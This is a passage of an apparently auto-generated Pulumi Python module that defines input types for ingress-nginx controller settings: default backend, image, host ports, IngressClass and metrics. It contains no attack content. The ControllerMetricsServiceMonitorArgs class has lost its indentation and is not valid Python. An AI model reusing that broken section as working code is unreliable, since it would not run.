        :param pulumi.Input[str] existing_psp: Use an existing PSP instead of creating one.
        :param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]] extra_volume_mounts: Additional volumeMounts to the default backend container. - name: copy-portal-skins mountPath: /var/lib/lemonldap-ng/portal/skins
        :param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]] extra_volumes: Additional volumes to the default backend pod. - name: copy-portal-skins emptyDir: {}
        :param pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs'] liveness_probe: Liveness probe values for default backend. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] node_selector: Node labels for default backend pod assignment Ref: https://kubernetes.io/docs/user-guide/node-selection/.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] pod_annotations: Annotations to be added to default backend pods.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] pod_labels: labels to add to the pod container metadata
        :param pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs'] pod_security_context: Security Context policies for controller pods. See https://kubernetes.io/docs/tasks/administer-cluster/sysctl-cluster/ for notes on enabling and using sysctls.
        :param pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs'] readiness_probe: Readiness probe values for default backend. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
        :param pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]] tolerations: Node tolerations for server scheduling to nodes with taints. Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
        """
        # Only explicitly supplied arguments are stored; unset fields stay
        # absent rather than being recorded as None.
        if affinity is not None:
            pulumi.set(__self__, "affinity", affinity)
        if autoscaling is not None:
            pulumi.set(__self__, "autoscaling", autoscaling)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if existing_psp is not None:
            pulumi.set(__self__, "existing_psp", existing_psp)
        if extra_args is not None:
            pulumi.set(__self__, "extra_args", extra_args)
        if extra_envs is not None:
            pulumi.set(__self__, "extra_envs", extra_envs)
        if extra_volume_mounts is not None:
            pulumi.set(__self__, "extra_volume_mounts", extra_volume_mounts)
        if extra_volumes is not None:
            pulumi.set(__self__, "extra_volumes", extra_volumes)
        if image is not None:
            pulumi.set(__self__, "image", image)
        if liveness_probe is not None:
            pulumi.set(__self__, "liveness_probe", liveness_probe)
        if min_available is not None:
            pulumi.set(__self__, "min_available", min_available)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if node_selector is not None:
            pulumi.set(__self__, "node_selector", node_selector)
        if pod_annotations is not None:
            pulumi.set(__self__, "pod_annotations", pod_annotations)
        if pod_labels is not None:
            pulumi.set(__self__, "pod_labels", pod_labels)
        if pod_security_context is not None:
            pulumi.set(__self__, "pod_security_context", pod_security_context)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if priority_class_name is not None:
            pulumi.set(__self__, "priority_class_name", priority_class_name)
        if readiness_probe is not None:
            pulumi.set(__self__, "readiness_probe", readiness_probe)
        if replica_count is not None:
            pulumi.set(__self__, "replica_count", replica_count)
        if resources is not None:
            pulumi.set(__self__, "resources", resources)
        if service is not None:
            pulumi.set(__self__, "service", service)
        if service_account is not None:
            pulumi.set(__self__, "service_account", service_account)
        if tolerations is not None:
            pulumi.set(__self__, "tolerations", tolerations)
    @property
    @pulumi.getter
    def affinity(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']]:
        return pulumi.get(self, "affinity")
    @affinity.setter
    def affinity(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.AffinityArgs']]):
        pulumi.set(self, "affinity", value)
    @property
    @pulumi.getter
    def autoscaling(self) -> Optional[pulumi.Input['AutoscalingArgs']]:
        return pulumi.get(self, "autoscaling")
    @autoscaling.setter
    def autoscaling(self, value: Optional[pulumi.Input['AutoscalingArgs']]):
        pulumi.set(self, "autoscaling", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter(name="existingPsp")
    def existing_psp(self) -> Optional[pulumi.Input[str]]:
        """
        Use an existing PSP instead of creating one.
        """
        return pulumi.get(self, "existing_psp")
    @existing_psp.setter
    def existing_psp(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "existing_psp", value)
    @property
    @pulumi.getter(name="extraArgs")
    def extra_args(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        return pulumi.get(self, "extra_args")
    @extra_args.setter
    def extra_args(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "extra_args", value)
    @property
    @pulumi.getter(name="extraEnvs")
    def extra_envs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]]:
        return pulumi.get(self, "extra_envs")
    @extra_envs.setter
    def extra_envs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.EnvVarArgs']]]]):
        pulumi.set(self, "extra_envs", value)
    @property
    @pulumi.getter(name="extraVolumeMounts")
    def extra_volume_mounts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]]:
        """
        Additional volumeMounts to the default backend container. - name: copy-portal-skins mountPath: /var/lib/lemonldap-ng/portal/skins
        """
        return pulumi.get(self, "extra_volume_mounts")
    @extra_volume_mounts.setter
    def extra_volume_mounts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeMountArgs']]]]):
        pulumi.set(self, "extra_volume_mounts", value)
    @property
    @pulumi.getter(name="extraVolumes")
    def extra_volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]]:
        """
        Additional volumes to the default backend pod. - name: copy-portal-skins emptyDir: {}
        """
        return pulumi.get(self, "extra_volumes")
    @extra_volumes.setter
    def extra_volumes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.VolumeArgs']]]]):
        pulumi.set(self, "extra_volumes", value)
    @property
    @pulumi.getter
    def image(self) -> Optional[pulumi.Input['ControllerImageArgs']]:
        return pulumi.get(self, "image")
    @image.setter
    def image(self, value: Optional[pulumi.Input['ControllerImageArgs']]):
        pulumi.set(self, "image", value)
    @property
    @pulumi.getter(name="livenessProbe")
    def liveness_probe(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]:
        """
        Liveness probe values for default backend. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
        """
        return pulumi.get(self, "liveness_probe")
    @liveness_probe.setter
    def liveness_probe(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]):
        pulumi.set(self, "liveness_probe", value)
    @property
    @pulumi.getter(name="minAvailable")
    def min_available(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "min_available")
    @min_available.setter
    def min_available(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_available", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="nodeSelector")
    def node_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Node labels for default backend pod assignment Ref: https://kubernetes.io/docs/user-guide/node-selection/.
        """
        return pulumi.get(self, "node_selector")
    @node_selector.setter
    def node_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "node_selector", value)
    @property
    @pulumi.getter(name="podAnnotations")
    def pod_annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Annotations to be added to default backend pods.
        """
        return pulumi.get(self, "pod_annotations")
    @pod_annotations.setter
    def pod_annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "pod_annotations", value)
    @property
    @pulumi.getter(name="podLabels")
    def pod_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        labels to add to the pod container metadata
        """
        return pulumi.get(self, "pod_labels")
    @pod_labels.setter
    def pod_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "pod_labels", value)
    @property
    @pulumi.getter(name="podSecurityContext")
    def pod_security_context(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']]:
        """
        Security Context policies for controller pods. See https://kubernetes.io/docs/tasks/administer-cluster/sysctl-cluster/ for notes on enabling and using sysctls.
        """
        return pulumi.get(self, "pod_security_context")
    @pod_security_context.setter
    def pod_security_context(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.PodSecurityContextArgs']]):
        pulumi.set(self, "pod_security_context", value)
    @property
    @pulumi.getter
    def port(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "port")
    @port.setter
    def port(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "port", value)
    @property
    @pulumi.getter(name="priorityClassName")
    def priority_class_name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "priority_class_name")
    @priority_class_name.setter
    def priority_class_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "priority_class_name", value)
    @property
    @pulumi.getter(name="readinessProbe")
    def readiness_probe(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]:
        """
        Readiness probe values for default backend. Ref: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#container-probes.
        """
        return pulumi.get(self, "readiness_probe")
    @readiness_probe.setter
    def readiness_probe(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ProbeArgs']]):
        pulumi.set(self, "readiness_probe", value)
    @property
    @pulumi.getter(name="replicaCount")
    def replica_count(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "replica_count")
    @replica_count.setter
    def replica_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "replica_count", value)
    @property
    @pulumi.getter
    def resources(self) -> Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]:
        return pulumi.get(self, "resources")
    @resources.setter
    def resources(self, value: Optional[pulumi.Input['pulumi_kubernetes.core.v1.ResourceRequirementsArgs']]):
        pulumi.set(self, "resources", value)
    @property
    @pulumi.getter
    def service(self) -> Optional[pulumi.Input['ControllerDefaultBackendServiceArgs']]:
        return pulumi.get(self, "service")
    @service.setter
    def service(self, value: Optional[pulumi.Input['ControllerDefaultBackendServiceArgs']]):
        pulumi.set(self, "service", value)
    @property
    @pulumi.getter(name="serviceAccount")
    def service_account(self) -> Optional[pulumi.Input['ControllerServiceAccountArgs']]:
        return pulumi.get(self, "service_account")
    @service_account.setter
    def service_account(self, value: Optional[pulumi.Input['ControllerServiceAccountArgs']]):
        pulumi.set(self, "service_account", value)
    @property
    @pulumi.getter
    def tolerations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]]:
        """
        Node tolerations for server scheduling to nodes with taints. Ref: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/
        """
        return pulumi.get(self, "tolerations")
    @tolerations.setter
    def tolerations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['pulumi_kubernetes.core.v1.TolerationArgs']]]]):
        pulumi.set(self, "tolerations", value)
@pulumi.input_type
class ControllerHostPortPortsArgs:
    """Pulumi input type with optional ``http`` and ``https`` port values."""

    def __init__(__self__, *,
                 http: Optional[pulumi.Input[int]] = None,
                 https: Optional[pulumi.Input[int]] = None):
        """Store whichever of ``http``/``https`` were actually supplied."""
        for key, port in (("http", http), ("https", https)):
            if port is not None:
                pulumi.set(__self__, key, port)

    @property
    @pulumi.getter
    def http(self) -> Optional[pulumi.Input[int]]:
        """The ``http`` port value, if one was set."""
        return pulumi.get(self, "http")

    @http.setter
    def http(self, port: Optional[pulumi.Input[int]]):
        pulumi.set(self, "http", port)

    @property
    @pulumi.getter
    def https(self) -> Optional[pulumi.Input[int]]:
        """The ``https`` port value, if one was set."""
        return pulumi.get(self, "https")

    @https.setter
    def https(self, port: Optional[pulumi.Input[int]]):
        pulumi.set(self, "https", port)
@pulumi.input_type
class ControllerHostPortArgs:
    """Pulumi input type: an ``enabled`` flag plus nested host-port
    ``ports`` (a ``ControllerHostPortPortsArgs``)."""

    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 ports: Optional[pulumi.Input['ControllerHostPortPortsArgs']] = None):
        """Record only the arguments that were actually provided."""
        for attr, arg in (("enabled", enabled), ("ports", ports)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """The ``enabled`` flag, if one was set."""
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, new_value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", new_value)

    @property
    @pulumi.getter
    def ports(self) -> Optional[pulumi.Input['ControllerHostPortPortsArgs']]:
        """The nested ``ports`` arguments, if set."""
        return pulumi.get(self, "ports")

    @ports.setter
    def ports(self, new_value: Optional[pulumi.Input['ControllerHostPortPortsArgs']]):
        pulumi.set(self, "ports", new_value)
@pulumi.input_type
class ControllerImageArgs:
    """Pulumi input type for container-image settings.

    Optional fields: ``allow_privilege_escalation``, ``digest``, ``image``,
    ``pull_policy``, ``read_only_root_filesystem``, ``registry``,
    ``repository``, ``run_as_non_root``, ``run_as_user`` (a string input)
    and ``tag``.
    """
    def __init__(__self__, *,
                 allow_privilege_escalation: Optional[pulumi.Input[bool]] = None,
                 digest: Optional[pulumi.Input[str]] = None,
                 image: Optional[pulumi.Input[str]] = None,
                 pull_policy: Optional[pulumi.Input[str]] = None,
                 read_only_root_filesystem: Optional[pulumi.Input[bool]] = None,
                 registry: Optional[pulumi.Input[str]] = None,
                 repository: Optional[pulumi.Input[str]] = None,
                 run_as_non_root: Optional[pulumi.Input[bool]] = None,
                 run_as_user: Optional[pulumi.Input[str]] = None,
                 tag: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] repository: for backwards compatibility consider setting the full image url via the repository value below use *either* current default registry/image or repository format or installing will fail.
        """
        # Only explicitly supplied arguments are stored; unset fields stay
        # absent rather than being recorded as None.
        if allow_privilege_escalation is not None:
            pulumi.set(__self__, "allow_privilege_escalation", allow_privilege_escalation)
        if digest is not None:
            pulumi.set(__self__, "digest", digest)
        if image is not None:
            pulumi.set(__self__, "image", image)
        if pull_policy is not None:
            pulumi.set(__self__, "pull_policy", pull_policy)
        if read_only_root_filesystem is not None:
            pulumi.set(__self__, "read_only_root_filesystem", read_only_root_filesystem)
        if registry is not None:
            pulumi.set(__self__, "registry", registry)
        if repository is not None:
            pulumi.set(__self__, "repository", repository)
        if run_as_non_root is not None:
            pulumi.set(__self__, "run_as_non_root", run_as_non_root)
        if run_as_user is not None:
            pulumi.set(__self__, "run_as_user", run_as_user)
        if tag is not None:
            pulumi.set(__self__, "tag", tag)
    @property
    @pulumi.getter(name="allowPrivilegeEscalation")
    def allow_privilege_escalation(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "allow_privilege_escalation")
    @allow_privilege_escalation.setter
    def allow_privilege_escalation(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "allow_privilege_escalation", value)
    @property
    @pulumi.getter
    def digest(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "digest")
    @digest.setter
    def digest(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "digest", value)
    @property
    @pulumi.getter
    def image(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "image")
    @image.setter
    def image(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "image", value)
    @property
    @pulumi.getter(name="pullPolicy")
    def pull_policy(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "pull_policy")
    @pull_policy.setter
    def pull_policy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "pull_policy", value)
    @property
    @pulumi.getter(name="readOnlyRootFilesystem")
    def read_only_root_filesystem(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "read_only_root_filesystem")
    @read_only_root_filesystem.setter
    def read_only_root_filesystem(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "read_only_root_filesystem", value)
    @property
    @pulumi.getter
    def registry(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "registry")
    @registry.setter
    def registry(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "registry", value)
    @property
    @pulumi.getter
    def repository(self) -> Optional[pulumi.Input[str]]:
        """
        for backwards compatibility consider setting the full image url via the repository value below use *either* current default registry/image or repository format or installing will fail.
        """
        return pulumi.get(self, "repository")
    @repository.setter
    def repository(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "repository", value)
    @property
    @pulumi.getter(name="runAsNonRoot")
    def run_as_non_root(self) -> Optional[pulumi.Input[bool]]:
        return pulumi.get(self, "run_as_non_root")
    @run_as_non_root.setter
    def run_as_non_root(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "run_as_non_root", value)
    @property
    @pulumi.getter(name="runAsUser")
    def run_as_user(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "run_as_user")
    @run_as_user.setter
    def run_as_user(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "run_as_user", value)
    @property
    @pulumi.getter
    def tag(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "tag")
    @tag.setter
    def tag(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tag", value)
@pulumi.input_type
class ControllerIngressClassResourceArgs:
    """Pulumi input type for IngressClass-resource settings.

    Optional fields: ``controller_value`` (wire name ``controllerValue``),
    ``default``, ``enabled``, ``name`` and ``parameters``.
    """
    def __init__(__self__, *,
                 controller_value: Optional[pulumi.Input[str]] = None,
                 default: Optional[pulumi.Input[bool]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None):
        """
        :param pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]] parameters: Parameters is a link to a custom resource containing additional configuration for the controller. This is optional if the controller does not require extra parameters.
        """
        # Only explicitly supplied arguments are stored; unset fields stay
        # absent rather than being recorded as None.
        if controller_value is not None:
            pulumi.set(__self__, "controller_value", controller_value)
        if default is not None:
            pulumi.set(__self__, "default", default)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if parameters is not None:
            pulumi.set(__self__, "parameters", parameters)
    @property
    @pulumi.getter(name="controllerValue")
    def controller_value(self) -> Optional[pulumi.Input[str]]:
        """The ``controllerValue`` value, stored under ``controller_value``."""
        return pulumi.get(self, "controller_value")
    @controller_value.setter
    def controller_value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "controller_value", value)
    @property
    @pulumi.getter
    def default(self) -> Optional[pulumi.Input[bool]]:
        """The ``default`` flag, if set."""
        return pulumi.get(self, "default")
    @default.setter
    def default(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "default", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """The ``enabled`` flag, if set."""
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """The ``name`` value, if set."""
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """
        Parameters is a link to a custom resource containing additional configuration for the controller. This is optional if the controller does not require extra parameters.
        """
        return pulumi.get(self, "parameters")
    @parameters.setter
    def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "parameters", value)
@pulumi.input_type
class ControllerMetricsPrometheusRulesArgs:
    """Pulumi input type for PrometheusRule settings.

    Optional fields: ``additional_labels`` (wire name ``additionalLabels``),
    ``enabled``, ``namespace`` and ``rules``.
    """
    def __init__(__self__, *,
                 additional_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 namespace: Optional[pulumi.Input[str]] = None,
                 rules: Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None):
        # Only explicitly supplied arguments are stored; unset fields stay
        # absent rather than being recorded as None.
        if additional_labels is not None:
            pulumi.set(__self__, "additional_labels", additional_labels)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
        if rules is not None:
            pulumi.set(__self__, "rules", rules)
    @property
    @pulumi.getter(name="additionalLabels")
    def additional_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """The ``additionalLabels`` mapping, stored under ``additional_labels``."""
        return pulumi.get(self, "additional_labels")
    @additional_labels.setter
    def additional_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "additional_labels", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """The ``enabled`` flag, if set."""
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter
    def namespace(self) -> Optional[pulumi.Input[str]]:
        """The ``namespace`` value, if set."""
        return pulumi.get(self, "namespace")
    @namespace.setter
    def namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "namespace", value)
    @property
    @pulumi.getter
    def rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
        """The ``rules`` list, if set."""
        return pulumi.get(self, "rules")
    @rules.setter
    def rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
        pulumi.set(self, "rules", value)
@pulumi.input_type
class ControllerMetricsServiceMonitorArgs:
def __init__(__self__, *,
additional_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
honor_labels: Optional[pulumi.Input[bool]] = None,
job_label: Optional[pulumi.Input[str]] = None,
metric_relabelings: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
namespace: Optional[pulumi.Input[str]] = None,
namespace_selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]] = None,
scrape_interval: Optional[pulumi.Input[str]] = None,
target_labels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] job_label: The label to use to retrieve the job name from.
"""
if additional_labels is not None:
pulumi.set(__self__, "additional_labels", additional_labels)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if honor_labels is not None:
pulumi.set(__self__, "honor_labels", honor_labels)
if job_label is not None:
pulumi.set(__self__, "job_label", job_label)
if metric_relabelings is not None:
pulumi.set(__self__, "metric_relabelings", metric_relabelings)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if namespace_selector is not None:
pulumi.set(__self__, "namespace_selector", namespace_selector)
if scrape_interval is not None:
pulumi.set(__self__, "scrape_interval", scrape_interval)
if target_labels is not None:
pulumi.set(__self__, "target_labels", target_labels)
@property
@pulumi.getter(name="additionalLabels")
def additional_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "additional_labels")
@additional_labels.setter
def additional_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "additional_labels", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="honorLabels")
def honor_labels(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "honor_labels")
@honor_labels.setter
def honor_labels(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "honor_labels", value)
@property
@pulumi.getter(name="jobLabel")
def job_label(self) -> Optional[pulumi.Input[str]]:
"""
The label to use to retrieve the job name from.
"""
return pulumi.get(self, "job_label")
@job_label.setter
def job_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "job_label", value)
@property
@pulumi.getter(name="metricRelabelings")
def metric_relabelings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "metric_relabelings")
@metric_relabelings.setter
def metric_relabelings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "metric_relabelings", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="namespaceSelector")
def namespace_selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]:
return pulumi.get(self, "namespace_selector")
@namespace_selector.setter
def namespace_selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Mapping[str, pulumi.Input[str]]]]]]):
pulumi.set(self, "namespace_selector", value)
    @property
    @pulumi.getter(name="scrapeInterval")
    def scrape_interval(self) -> Optional[pulumi.Input[str]]:
        """Scrape interval as a duration string (e.g. ``"30s"`` — format per
        Prometheus conventions; not validated here)."""
        return pulumi.get(self, "scrape_interval")
    @scrape_interval.setter
    def scrape_interval(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "scrape_interval", value)
    @property
    @pulumi.getter(name="targetLabels")
    def target_labels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Labels to transfer from the Kubernetes Service onto the scraped
        metrics — NOTE(review): presumed ServiceMonitor ``targetLabels``; confirm."""
        return pulumi.get(self, "target_labels")
    @target_labels.setter
    def target_labels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "target_labels", value)
@pulumi.input_type
class ControllerMetricsServiceArgs:
    """Input properties for the controller metrics Service.

    NOTE(review): auto-generated Pulumi input type — it presumably mirrors the
    ingress-nginx Helm chart's ``controller.metrics.service`` values block;
    regenerate rather than hand-editing the structure. All fields are optional;
    only explicitly supplied values are stored.
    """
    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 cluster_ip: Optional[pulumi.Input[str]] = None,
                 external_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 external_traffic_policy: Optional[pulumi.Input[str]] = None,
                 load_balancer_ips: Optional[pulumi.Input[str]] = None,
                 load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 node_port: Optional[pulumi.Input[str]] = None,
                 service_port: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        # Only record values the caller actually supplied; unset keys stay
        # absent from the property table (Pulumi distinguishes unset from None).
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if cluster_ip is not None:
            pulumi.set(__self__, "cluster_ip", cluster_ip)
        if external_ips is not None:
            pulumi.set(__self__, "external_ips", external_ips)
        if external_traffic_policy is not None:
            pulumi.set(__self__, "external_traffic_policy", external_traffic_policy)
        if load_balancer_ips is not None:
            pulumi.set(__self__, "load_balancer_ips", load_balancer_ips)
        if load_balancer_source_ranges is not None:
            pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges)
        if node_port is not None:
            pulumi.set(__self__, "node_port", node_port)
        if service_port is not None:
            pulumi.set(__self__, "service_port", service_port)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """Annotations to apply to the metrics Service."""
        return pulumi.get(self, "annotations")
    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "annotations", value)
    @property
    @pulumi.getter(name="clusterIP")
    def cluster_ip(self) -> Optional[pulumi.Input[str]]:
        """Explicit cluster IP for the Service (wire name ``clusterIP``)."""
        return pulumi.get(self, "cluster_ip")
    @cluster_ip.setter
    def cluster_ip(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_ip", value)
    @property
    @pulumi.getter(name="externalIPs")
